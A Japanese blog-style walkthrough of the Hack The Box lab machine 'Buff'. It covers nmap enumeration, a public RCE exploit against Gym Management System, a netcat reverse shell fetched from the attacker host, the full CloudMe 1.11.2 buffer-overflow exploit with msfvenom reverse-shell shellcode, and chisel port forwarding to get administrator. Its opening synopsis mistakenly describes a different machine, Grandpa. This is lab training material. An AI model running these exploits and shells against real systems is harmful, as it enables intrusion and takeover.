はじめに
実家に帰ったとたん親にアカウントやメールの設定を延々とやらされましたいっきゅうです。今回もライトアップまとめていきたいと思います。
間違っているところとかあればご指摘お願いします。ちなみに日をまたいで書いているのでローカルのipアドレスに一貫性がありませんがとくに差し支えないかと思います。
twitter:ikkyu(@ikk_hck)
Buff
From the HackTheBox
SYNOPSISGrandpa is one of the simpler machines on Hack The Box, however it covers the widely-exploitedCVE-2017-7269. This vulnerability is trivial to exploit and granted immediate access to thousandsof IIS servers around the globe when it became public knowledge.
Enumeration
nmap -sV --script vuln -oA nmap 10.10.10.198
nmapでポートスキャン
Nmap scan report for 10.10.10.198
Host is up (0.34s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.198
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.198:8080/
| Form id:
| Form action: include/process_login.php
|
| Path: http://10.10.10.198:8080/facilities.php
| Form id:
| Form action: include/process_login.php
|
| Path: http://10.10.10.198:8080/packages.php
| Form id:
| Form action: include/process_login.php
|
| Path: http://10.10.10.198:8080/about.php
| Form id:
| Form action: include/process_login.php
|
| Path: http://10.10.10.198:8080/contact.php
| Form id:
| Form action: include/process_login.php
|
| Path: http://10.10.10.198:8080/index.php
| Form id:
|_ Form action: include/process_login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:apache:http_server:2.4.43:
| CVE-2010-0425 10.0 https://vulners.com/cve/CVE-2010-0425
| CVE-1999-1412 10.0 https://vulners.com/cve/CVE-1999-1412
| CVE-1999-1237 10.0 https://vulners.com/cve/CVE-1999-1237
| CVE-1999-0236 10.0 https://vulners.com/cve/CVE-1999-0236
| CVE-2009-1955 7.8 https://vulners.com/cve/CVE-2009-1955
| CVE-2007-6423 7.8 https://vulners.com/cve/CVE-2007-6423
| CVE-2007-0086 7.8 https://vulners.com/cve/CVE-2007-0086
| CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984
| CVE-2009-3095 7.5 https://vulners.com/cve/CVE-2009-3095
| CVE-2007-4723 7.5 https://vulners.com/cve/CVE-2007-4723
| CVE-2009-1891 7.1 https://vulners.com/cve/CVE-2009-1891
| CVE-2009-1890 7.1 https://vulners.com/cve/CVE-2009-1890
| CVE-2008-2579 6.8 https://vulners.com/cve/CVE-2008-2579
| CVE-2007-5156 6.8 https://vulners.com/cve/CVE-2007-5156
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2011-1752 5.0 https://vulners.com/cve/CVE-2011-1752
| CVE-2010-1452 5.0 https://vulners.com/cve/CVE-2010-1452
| CVE-2010-0408 5.0 https://vulners.com/cve/CVE-2010-0408
| CVE-2009-2699 5.0 https://vulners.com/cve/CVE-2009-2699
| CVE-2007-0450 5.0 https://vulners.com/cve/CVE-2007-0450
| CVE-2005-1268 5.0 https://vulners.com/cve/CVE-2005-1268
| CVE-2003-0020 5.0 https://vulners.com/cve/CVE-2003-0020
| CVE-2001-1556 5.0 https://vulners.com/cve/CVE-2001-1556
| CVE-1999-0678 5.0 https://vulners.com/cve/CVE-1999-0678
| CVE-1999-0289 5.0 https://vulners.com/cve/CVE-1999-0289
| CVE-1999-0070 5.0 https://vulners.com/cve/CVE-1999-0070
| CVE-2009-1195 4.9 https://vulners.com/cve/CVE-2009-1195
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
| CVE-2011-1783 4.3 https://vulners.com/cve/CVE-2011-1783
| CVE-2010-0434 4.3 https://vulners.com/cve/CVE-2010-0434
| CVE-2008-2939 4.3 https://vulners.com/cve/CVE-2008-2939
| CVE-2008-2168 4.3 https://vulners.com/cve/CVE-2008-2168
| CVE-2008-0455 4.3 https://vulners.com/cve/CVE-2008-0455
| CVE-2007-6420 4.3 https://vulners.com/cve/CVE-2007-6420
| CVE-2007-6388 4.3 https://vulners.com/cve/CVE-2007-6388
| CVE-2007-5000 4.3 https://vulners.com/cve/CVE-2007-5000
| CVE-2007-4465 4.3 https://vulners.com/cve/CVE-2007-4465
| CVE-2007-1349 4.3 https://vulners.com/cve/CVE-2007-1349
| CVE-2007-6422 4.0 https://vulners.com/cve/CVE-2007-6422
| CVE-2007-6421 3.5 https://vulners.com/cve/CVE-2007-6421
|_ CVE-2001-0131 1.2 https://vulners.com/cve/CVE-2001-0131
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 25 20:51:08 2020 -- 1 IP address (1 host up) scanned in 370.35 seconds```
8080ポートが開いていることがわかったのでアクセスしてみます。
さらにサイトをさぐっていくと、GymManagementSystemが使われていることがわかります。
Local Privilege Escalation
exploitdbで検索すると
$ searchsploit gym
[i] Found (#1): /home/ikkyu/exploitdb/files_exploits.csv
[i] To remove this message, please edit "/home/ikkyu/exploitdb/.searchsploit_rc" for "files_exploits.csv" (package_array: exploitdb)
[i] Found (#1): /home/ikkyu/exploitdb/files_shellcodes.csv
[i] To remove this message, please edit "/home/ikkyu/exploitdb/.searchsploit_rc" for "files_shellcodes.csv" (package_array: exploitdb)
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection | php/webapps/42801.txt
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
48506.pyがありました。
python2で実行。実行の際にいくつかのモジュールを要求されます。
$ python ~/exploitdb/exploits/php/webapps/48506.py http://10.10.10.198:8080/
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload>
成功したようです。権限を確認すると
C:\xampp\htdocs\gym\upload> whoami
�PNG
�
buff\shaun
buff\shaun権限であることがわかります。
リバースシェル
サーバをたててターゲットマシンからの接続を待ち受けます。
$ python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
侵入したターゲットマシンにnc.exeを転送したいので以下を実行。
C:\xampp\htdocs\gym\upload> curl http://10.10.14.6:8000/nc.exe -o nc.exe
�PNG
�
MZ����@��� �!�L�!This program cannot be run in DOS mode.
$PEL��sN�
Tx�p@�m� �P
|�
確認してみるとうまくいっているようです。
C:\xampp\htdocs\gym\upload> dir
�PNG
�
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\xampp\htdocs\gym\upload
22/12/2020 12:04 <DIR> .
22/12/2020 12:04 <DIR> ..
22/12/2020 12:04 53 kamehameha.php
22/12/2020 11:40 38,616 nc.exe
2 File(s) 38,669 bytes
2 Dir(s) 7,315,296,256 bytes free
リバースシェルをするためにまちうけます。
rlwrap nc -lvnp 4444
Listening on 0.0.0.0 4444
ターゲットのマシンから接続を実行。
C:\xampp\htdocs\gym\upload> nc.exe 10.10.14.6 4444 -e cmd.exe
リバースシェル成功です。
rlwrap nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.198 49682
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\gym\upload>
ちなみにrlwrapではなく単純にncでリバースシェルすると、コマンド履歴などが使えません。具体的には過去に打ち込んだコマンドをもう一度打ち込みたいときに「↑」をおすと以下のようになってしまいます。
C:\xampp\htdocs\gym\upload>^[[A^[[A
Administrator Privilege Escalation
実行中のプロセスを確認してみると
C:\xampp\htdocs\gym\upload>tasklist
tasklist
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 0 8 K
System 4 0 44 K
Registry 104 0 7,392 K
smss.exe 368 0 384 K
csrss.exe 456 0 3,856 K
wininit.exe 532 0 4,608 K
csrss.exe 540 1 3,452 K
winlogon.exe 604 1 8,888 K
services.exe 676 0 8,296 K
lsass.exe 696 0 12,072 K
svchost.exe 812 0 2,520 K
fontdrvhost.exe 836 0 13,900 K
fontdrvhost.exe 844 1 8,100 K
svchost.exe 860 0 22,724 K
svchost.exe 956 0 12,036 K
svchost.exe 1004 0 6,028 K
dwm.exe 328 1 41,676 K
svchost.exe 360 0 8,292 K
svchost.exe 948 0 7,100 K
svchost.exe 996 0 9,664 K
svchost.exe 1076 0 18,084 K
svchost.exe 1136 0 18,504 K
svchost.exe 1208 0 5,984 K
svchost.exe 1280 0 5,680 K
svchost.exe 1380 0 8,672 K
svchost.exe 1388 0 10,612 K
svchost.exe 1408 0 4,044 K
svchost.exe 1416 0 7,352 K
svchost.exe 1516 0 9,604 K
svchost.exe 1552 0 12,944 K
Memory Compression 1564 0 30,132 K
svchost.exe 1592 0 7,004 K
svchost.exe 1676 0 6,028 K
svchost.exe 1772 0 5,036 K
svchost.exe 1780 0 5,792 K
svchost.exe 1824 0 6,956 K
svchost.exe 1880 0 8,588 K
svchost.exe 1988 0 6,180 K
svchost.exe 1456 0 6,364 K
svchost.exe 1336 0 7,044 K
svchost.exe 1240 0 4,432 K
svchost.exe 2060 0 7,564 K
svchost.exe 2132 0 9,108 K
svchost.exe 2284 0 5,600 K
spoolsv.exe 2300 0 12,040 K
svchost.exe 2424 0 6,124 K
svchost.exe 2736 0 7,660 K
svchost.exe 2748 0 14,036 K
svchost.exe 2760 0 19,308 K
svchost.exe 2768 0 3,696 K
svchost.exe 2756 0 4,532 K
vmtoolsd.exe 2788 0 18,696 K
svchost.exe 2796 0 13,656 K
svchost.exe 2804 0 15,532 K
SecurityHealthService.exe 2832 0 13,048 K
MsMpEng.exe 2864 0 169,640 K
VGAuthService.exe 2880 0 7,840 K
svchost.exe 2980 0 7,080 K
svchost.exe 2052 0 9,868 K
svchost.exe 3104 0 9,768 K
svchost.exe 3144 0 3,568 K
dllhost.exe 3660 0 11,308 K
WmiPrvSE.exe 3848 0 14,188 K
msdtc.exe 2720 0 8,132 K
svchost.exe 4540 0 30,464 K
sihost.exe 4596 1 21,576 K
svchost.exe 4620 1 11,716 K
svchost.exe 4672 1 24,212 K
taskhostw.exe 4768 1 9,896 K
svchost.exe 4932 0 5,548 K
ctfmon.exe 4992 1 10,796 K
svchost.exe 5080 0 5,848 K
svchost.exe 5092 0 11,500 K
NisSrv.exe 5212 0 7,268 K
WmiPrvSE.exe 5276 0 18,888 K
explorer.exe 5716 1 79,172 K
svchost.exe 5776 0 16,212 K
svchost.exe 5796 0 11,372 K
svchost.exe 5960 0 5,312 K
svchost.exe 6000 0 12,380 K
svchost.exe 5444 0 4,852 K
svchost.exe 4416 0 4,976 K
ShellExperienceHost.exe 1048 1 51,772 K
SearchUI.exe 6360 1 118,800 K
RuntimeBroker.exe 6588 1 16,452 K
ApplicationFrameHost.exe 6780 1 26,996 K
MicrosoftEdge.exe 7072 1 55,284 K
browser_broker.exe 7160 1 6,876 K
svchost.exe 6316 0 4,668 K
Windows.WARP.JITService.e 4404 0 3,380 K
RuntimeBroker.exe 4356 1 5,012 K
MicrosoftEdgeCP.exe 4220 1 18,920 K
RuntimeBroker.exe 4464 1 13,908 K
MicrosoftEdgeCP.exe 2672 1 21,300 K
svchost.exe 7332 0 11,264 K
conhost.exe 7464 0 1,008 K
SearchIndexer.exe 8140 0 23,680 K
MSASCuiL.exe 7424 1 6,812 K
vmtoolsd.exe 5748 1 13,220 K
httpd.exe 1712 0 460 K
mysqld.exe 7716 0 3,480 K
svchost.exe 2572 0 3,636 K
svchost.exe 5304 1 14,224 K
httpd.exe 1460 0 9,188 K
svchost.exe 6552 0 12,824 K
SgrmBroker.exe 2296 0 2,704 K
svchost.exe 8248 0 6,984 K
CompatTelRunner.exe 1104 0 632 K
conhost.exe 8608 0 1,216 K
svchost.exe 7788 0 8,192 K
Microsoft.Photos.exe 2528 1 5,240 K
RuntimeBroker.exe 3856 1 12,252 K
WinStore.App.exe 8424 1 26,440 K
RuntimeBroker.exe 4556 1 5,240 K
SystemSettings.exe 7764 1 32,228 K
svchost.exe 5984 0 4,748 K
svchost.exe 7484 0 9,652 K
taskhostw.exe 5920 1 20,872 K
taskhostw.exe 3520 0 23,440 K
CompatTelRunner.exe 1548 0 2,428 K
conhost.exe 8792 0 9,736 K
TrustedInstaller.exe 1016 0 5,524 K
svchost.exe 196 0 5,352 K
TiWorker.exe 2148 0 103,996 K
svchost.exe 8784 0 7,844 K
svchost.exe 6488 0 3,792 K
svchost.exe 8596 0 11,860 K
cmd.exe 7204 0 2,432 K
conhost.exe 9176 0 9,132 K
nc.exe 7192 0 5,436 K
cmd.exe 4504 0 3,988 K
cmd.exe 708 0 3,208 K
conhost.exe 2452 0 10,868 K
CloudMe.exe 3496 0 26,884 K
timeout.exe 5968 0 3,920 K
tasklist.exe 8796 0 7,772 K
CloudMe.exeがあります。CloudMeにはバッファオーバーフローの脆弱性が知られています。
exploitdbで検索。
$ searchsploit cloudme
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASL | win
ws/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASL | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasplo | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(D | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Over | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghu | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 ( | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) | windows_x86-64/remote/44784.py
---------------------------------------------- ---------------------------------
Shellcodes: No Results
一番上の48389.pyを使用します。
msfvenom
48389.pyの内容を確認してみると
$ cat /home/ikkyu/exploitdb/exploits/windows/remote/48389.py
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
# Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
# msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
中断あたりの
# msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
から電卓を起動する仕様であることがわかります。これではまずいので変更します。
msfvenomで以下を実行し、電卓を起動しないでnc.exeを実行するペイロードを作成します。
$ msfvenom -a x86 -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.28 4445 -e cmd.exe' -b '\x00\x0A\x0D' -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 273 (iteration=0)
x86/shikata_ga_nai chosen with final size 273
Payload size: 273 bytes
Final size of python file: 1452 bytes
payload = b""
payload += b"\xda\xcf\xd9\x74\x24\xf4\xbe\xe3\xce\xa2\x54\x5a"
payload += b"\x29\xc9\xb1\x3e\x31\x72\x19\x83\xea\xfc\x03\x72"
payload += b"\x15\x01\x3b\x5e\xbc\x47\xc4\x9f\x3d\x27\x4c\x7a"
payload += b"\x0c\x67\x2a\x0e\x3f\x57\x38\x42\xcc\x1c\x6c\x77"
payload += b"\x47\x50\xb9\x78\xe0\xde\x9f\xb7\xf1\x72\xe3\xd6"
payload += b"\x71\x88\x30\x39\x4b\x43\x45\x38\x8c\xb9\xa4\x68"
payload += b"\x45\xb6\x1b\x9d\xe2\x82\xa7\x16\xb8\x03\xa0\xcb"
payload += b"\x09\x22\x81\x5d\x01\x7d\x01\x5f\xc6\xf6\x08\x47"
payload += b"\x0b\x32\xc2\xfc\xff\xc9\xd5\xd4\x31\x32\x79\x19"
payload += b"\xfe\xc1\x83\x5d\x39\x39\xf6\x97\x39\xc4\x01\x6c"
payload += b"\x43\x12\x87\x77\xe3\xd1\x3f\x5c\x15\x36\xd9\x17"
payload += b"\x19\xf3\xad\x70\x3e\x02\x61\x0b\x3a\x8f\x84\xdc"
payload += b"\xca\xcb\xa2\xf8\x97\x88\xcb\x59\x72\x7f\xf3\xba"
payload += b"\xdd\x20\x51\xb0\xf0\x35\xe8\x9b\x9e\xc8\x7e\xa6"
payload += b"\xed\xca\x80\xa9\x41\xa2\xb1\x22\x0e\xb5\x4d\xe1"
payload += b"\x6a\x49\x04\xa8\xdb\xc1\xc1\x38\x5e\x8c\xf1\x96"
payload += b"\x9d\xa8\x71\x13\x5e\x4f\x69\x56\x5b\x14\x2d\x8a"
payload += b"\x11\x05\xd8\xac\x86\x26\xc9\xee\x12\x84\x8a\x91"
payload += b"\x0f\x44\x1b\x0e\xb0A8\xd0\xbf\xc1\x5b\x6b\x1c\x79"
payload += b"\xe5\xe6\xc0\xf0\x65\x94\x97\x9b\xe1\x38\x06\x3f"
payload += b"\xc4\xa5\xae\xda\x38\x14\x7f\x0b\x08\x66\x51\x62"
payload += b"\x5e\xa8\x9f\xbc\xbe\x80\xeb\x88\x8b\xc8\x3e\x94"
payload += b"\xd3\x6b\x2c\x32\x3a\x0e\xd6\xdf\x42"
48389.pyのペイロード部分を上記のペイロードと差し替えたものをてきとうに名前をつけて保存します。今回はbuff.py。
リモートポートフォワーディング
ターゲットマシン上にはbuff.pyを実行するためのpython環境がなく、また48389.pyはコード内容の下から3行目から8888番ポートにconnectすることがわかりますが、8888番ポートへは外部からアクセスできない(セッションなどを取得せずに単にメタスプロイトのモジュールを使った場合タイムアウトした)ためリモートポートフォワーディングします。ポートフォワードやリモートポートフォワードについてはここにわかりやすくまとめられていました。
nc.exeをアップロードしたときと同様にchisel.exeをcurlをつかってアップロードします(nc使ってアップロードを試みましたがうまく行きませんでした。curlがそのままファイルをまるごとダウンロードしてくるのに対して、ncは空のファイルを作ってからそこに中身のみを転送するので違いが生じた可能性があります)。
以下を実行してターゲットマシンからの接続を待受けます。
$ chisel server -p 1234 -reverse -v
2021/01/07 17:33:38 server: Reverse tunnelling enabled
2021/01/07 17:33:38 server: Fingerprint Wf5cpZzaVbfNXiWNsUT8AEcLYgEeOI7r3U440nagv08=
2021/01/07 17:33:38 server: Listening on http://0.0.0.0:1234
リバースシェルしたシェル(ターゲットマシン側)でchiselを実行。
C:\xampp\htdocs\gym\upload>chisel.exe client -v 10.10.14.28:1234 R:8888:127.0.0.1:8888 --keepalive:1000
chisel.exe client -v 10.10.14.28:1234 R:8888:127.0.0.1:8888 --keepalive:1000
2021/01/07 07:31:30 client: Connecting to ws://10.10.14.28:1234
2021/01/07 07:31:30 client: tun: proxy#1000=>--keepalive:1000: Listening
2021/01/07 07:31:30 client: tun: Bound proxies
2021/01/07 07:31:31 client: Handshaking...
2021/01/07 07:31:33 client: Sending config
2021/01/07 07:31:33 client: Connected (Latency 336.4421ms)
2021/01/07 07:31:33 client: tun: SSH connected
待ち受けをしていたシェルをみてみると、接続が成功していることが分かります。
$ chisel server -p 1234 -reverse -v
2021/01/07 16:29:10 server: Reverse tunnelling enabled
2021/01/07 16:29:10 server: Fingerprint QyRH0ZUd4d4o1xlE0xm8SFgDe1hcTvY/xaltedm+/7M=
2021/01/07 16:29:10 server: Listening on http://0.0.0.0:1234
2021/01/07 16:30:00 server: session#1: Handshaking...
2021/01/07 16:30:02 server: session#1: Verifying configuration
2021/01/07 16:30:02 server: session#1: tun: Created
2021/01/07 16:30:02 server: session#1: tun: proxy#R:8888=>8888: Listening
2021/01/07 16:30:02 server: session#1: tun: Bound proxies
2021/01/07 16:30:02 server: session#1: tun: SSH connected
そしてさらに、msfvenomでペイロードを作成した時に指定したポートを設定してncで待ちうけます。
nc -lnvp 4445
Listening on 0.0.0.0 4445
最後にbuff.pyを実行してから待ち受けていたncをみると成功していることが分かります。
nc -lnvp 4445
Listening on 0.0.0.0 4445
Connection received on 10.10.10.198 49686
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator
ややこしいのでこれまでの過程をまとめると、
1)リバースシェルでターゲットマシンのシェルを取得
2)そのシェルをつかってローカルマシンにリモートポートフォワーディング
3)ローカルでbuff.pyを実行(8888番ポートにコネクト)
4)ターゲットマシンは8888番にコネクトしてきたアクセスを自分の8888番ポートに転送(セッションなどを取得せずに単にメタスプロイトのモジュールを使おうとしたらタイムアウトしたので外部から8888番ポートには多分アクセスできない)
adminをとれたのであとはフラグを探すだけ。
C:\Windows\system32>cd /
cd /
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\
16/06/2020 18:08 <DIR> PerfLogs
16/06/2020 19:37 <DIR> Program Files
12/04/2018 09:16 <DIR> Program Files (x86)
16/06/2020 19:52 <DIR> Users
18/07/2020 16:35 <DIR> Windows
16/06/2020 15:40 <DIR> xampp
0 File(s) 0 bytes
6 Dir(s) 7,867,031,552 bytes free
C:\>cd Users
cd Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users
16/06/2020 19:52 <DIR> .
16/06/2020 19:52 <DIR> ..
20/07/2020 11:08 <DIR> Administrator
16/06/2020 14:08 <DIR> Public
16/06/2020 14:11 <DIR> shaun
0 File(s) 0 bytes
5 Dir(s) 7,873,511,424 bytes free
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users\Administrator
20/07/2020 11:08 <DIR> .
20/07/2020 11:08 <DIR> ..
18/07/2020 16:36 <DIR> 3D Objects
16/06/2020 15:48 <DIR> CloudMe
18/07/2020 16:36 <DIR> Contacts
18/07/2020 16:36 <DIR> Desktop
18/07/2020 16:36 <DIR> Documents
18/07/2020 16:36 <DIR> Downloads
18/07/2020 16:36 <DIR> Favorites
18/07/2020 16:36 <DIR> Links
18/07/2020 16:36 <DIR> Music
16/06/2020 15:44 <DIR> OneDrive
18/07/2020 16:36 <DIR> Pictures
18/07/2020 16:36 <DIR> Saved Games
18/07/2020 16:36 <DIR> Searches
18/07/2020 16:36 <DIR> Videos
0 File(s) 0 bytes
16 Dir(s) 7,768,076,288 bytes free
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users\Administrator\Desktop
18/07/2020 16:36 <DIR> .
18/07/2020 16:36 <DIR> ..
16/06/2020 15:41 1,417 Microsoft Edge.lnk
07/01/2021 07:13 34 root.txt
2 File(s) 1,451 bytes
2 Dir(s) 7,872,905,216 bytes free
おつかれさまでした。では。